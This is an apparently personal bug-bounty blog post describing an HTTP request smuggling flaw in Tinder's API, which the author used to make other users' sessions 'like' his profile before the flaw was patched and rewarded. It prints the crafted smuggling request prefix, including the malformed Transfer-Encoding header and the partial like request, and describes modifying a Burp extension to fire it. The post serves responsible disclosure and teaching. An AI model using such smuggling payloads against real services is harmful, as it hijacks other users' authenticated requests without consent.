Başlangıç » Uncategorized » How Did Tons of People Like Me on Tinder?
How Did Tons of People Like Me on Tinder?
Kasım 23, 2019 tarihinde mustafa iran tarafından gönderildi
These days, dating apps like tinder are so popular. So they have attracted my attention too, back in 2016. In this blog post, I will tell you why tons of people liked me just in a minute. At this point I should say that, I am not handsome, the reason is pretty different. 🙂 However, for those who are after plenty of likes, this post might be a some kind of clickbait for you. Because it is not possible anymore (thanks to me 🙂 ) at least using the technique here (share with me if you have any 🙂 ). You have been warned. Keep reading if you are curious about the technical reason.
Ok lets get to business. I have been using the app since 2016. When Anand Prakash posted about the bug he had found in tinder (which turns out it is actually on accountkit by Facebook), I made a facepalm, because I also guessed the same vulnerability but I was so lazy and hopeless to check it out. Since then, I wanted to have a nice tinder vulnerability, and put it on my to-do list during my carrier 🙂
In august 2019, James Kettle has published a new paper about HTTP request smuggling vulnerabilities. (I suggest you to read the paper otherwise you may not get the further of this post.) I had read the paper and honestly impressed because of technical details and consequences of the vulnerability. I also thought that it might make it possible to exploit my other attack scenarious. I wanted to look for places I would like to hack. Suprisingly (maybe not, due to being a new thing), tinder’s multiple applications was vulnerable to smuggling attacks. So, I was like “OK there is the vulnerability, what should be done to provide a POC?”
I had reported the vulnerability without a POC to get rid of a potential duplicate which is the nightmare of BB hunter or to be able to know if it is has been already known. Luckily, it wasn’t. (14th of august 2019)
Tinder app uses a backend api.gotinder.com which accepts requests as “json formatted”. This creates tasteless situation when exploiting smuggling vulnerability. I haven’t come across a handy cache mechanism at a glance. So I searched a bit and focused on “like” request which send using GET method. Below request is an example of a like request. __BENIM_ID__ is my tinder user id. Dynamic parts are id of the one who you liked and some authorization and authentication tokens.
GET /like/__BENİM_ID__?locale=tr&s_number=852101394 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Encoding: gzip, deflate
app-session-id: _belongs_the_one_who_send like__
user-session-id: _belongs_the_one_who_send like__
X-Auth-Token: _belongs_the_one_who_send like__
I needed to build a malicious request and join it together with a request which “likes” my account. I came up with the below.
POST /profile/photos HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept-Encoding: gzip, deflate
Transfer-Encoding : chunked
GET /like/__BENİM_ID__?locale=en&s_number=799974200 HTTP/1.1
There is no special purpose of /profile/photos. It is enough not to be rejected or not to be directed to a different endpoint. Below part is a “like” request which sent for my own account. As you can see, there is not much left from the original “like” request. the reason is to let the victim to complete the rest with his/her request. Because the idea of smuggling is joining our request (prefix) with victim’s request together. So victims completes it with their own authorization authentication headers.
I changed the script of Burp smuggling extention to make only attack request and not the victim requests. The extention config was something like the below
Screen Shot 2019-11-24 at 00.21.48
I fired up the attack button and Boom! 🙂 I got hundreds of likes in minutes 🙂
Actually, they hadn’t swipe me right but I had made them like my account. I got a working POC. An ultimate “boost” feature for free. By using this, I could enumerate all users on tinder or sell an ultimate boosting service. Likes are nice but there is a saying in Turkish; there is no pleasant things happen with enforcement.It was the time to add the POC to the report (24 august 2019)
It would be my second laziness not to escalate it to a full account takeover vulnerability. However, Tinder team threw me a curve by mitigating the issue in hours.
I reported smuggling issue for other domains of tinder and they marked all of them as a duplicate of the report which I wrote in this post. Eventhough it ‘s been mitigated in hours, it took months to mark it as resolved. In 22nd of October, it ‘s been marked as resolved and rewarded with $2,5K.
Thanks for reading.